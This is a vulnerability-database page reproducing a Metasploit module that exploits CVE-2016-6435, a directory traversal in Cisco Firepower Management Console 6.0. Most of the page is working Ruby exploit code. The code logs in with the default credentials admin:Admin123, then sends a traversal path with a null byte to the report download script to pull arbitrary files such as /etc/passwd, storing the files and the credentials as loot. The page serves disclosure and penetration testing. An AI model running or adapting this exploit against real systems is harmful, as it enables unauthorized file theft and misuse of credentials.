Lucene search
K

Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal

🗓️ 09 Jan 2017 20:39:37Reported by Matt, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 25 Views

Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal exploi

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal",
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in Cisco Firepower Management
        under the context of www user. Authentication is required to exploit this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matt',   # Original discovery && PoC
          'sinn3r', # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2016-6435'],
          ['URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking']
        ],
      'DisclosureDate' => '2016-10-10',
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL'   => true,
          'SSLVersion' => 'Auto'
        }
    ))

    register_options(
      [
        # admin:Admin123 is the default credential for 6.0.1
        OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
        OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
        OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd'])
      ])
  end

  def do_login(ip)
    console_user = datastore['USERNAME']
    console_pass = datastore['PASSWORD']
    uri          = normalize_uri(target_uri.path, 'login.cgi')

    print_status("Attempting to login in as #{console_user}:#{console_pass}")

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'vars_post' => {
        'username' => console_user,
        'password' => console_pass,
        'target'   => ''
      }
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
    end

    res_cookie = res.get_cookies
    if res.code == 302 && res_cookie.include?('CGISESSID')
      cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
      vprint_status("CGI Session ID: #{cgi_sid}")
      print_good("Authenticated as #{console_user}:#{console_pass}")
      report_cred(ip: ip, user: console_user, password: console_pass)
      return cgi_sid
    end

    nil
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: rport,
      service_name: 'cisco',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def download_file(cgi_sid, file)
    file_path = "../../..#{Rex::FileUtils.normalize_unix_path(file)}\x00"
    print_status("Requesting: #{file_path}")
    send_request_cgi({
      'method' => 'GET',
      'cookie' => "CGISESSID=#{cgi_sid}",
      'uri'    => normalize_uri(target_uri.path, 'events/reports/view.cgi'),
      'vars_get' => {
        'download' => '1',
        'files'    => file_path
      }
    })
  end

  def remote_file_exists?(res)
    (
      res.headers['Content-Disposition'] &&
      res.headers['Content-Disposition'].match(/attachment; filename=/) &&
      res.headers['Content-Type'] &&
      res.headers['Content-Type'] == 'application/octet-stream'
    )
  end

  def save_file(res, ip)
    fname = res.headers['Content-Disposition'].scan(/filename=(.+)/).flatten.first || File.basename(datastore['FILEPATH'])

    path = store_loot(
      'cisco.https',
      'application/octet-stream',
      ip,
      res.body,
      fname
      )

    print_good("File saved in: #{path}")
  end

  def run_host(ip)
    cgi_sid = do_login(ip)

    unless cgi_sid
      fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
    end

    res = download_file(cgi_sid, datastore['FILEPATH'])

    if res.nil?
      print_error("Connection timed out while downloading: #{datastore['FILEPATH']}")
    elsif remote_file_exists?(res)
      save_file(res, ip)
    else
      print_error("Remote file not found: #{datastore['FILEPATH']}")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
10High risk
Vulners AI Score10
CVSS 24
CVSS 36.5
EPSS0.36617
25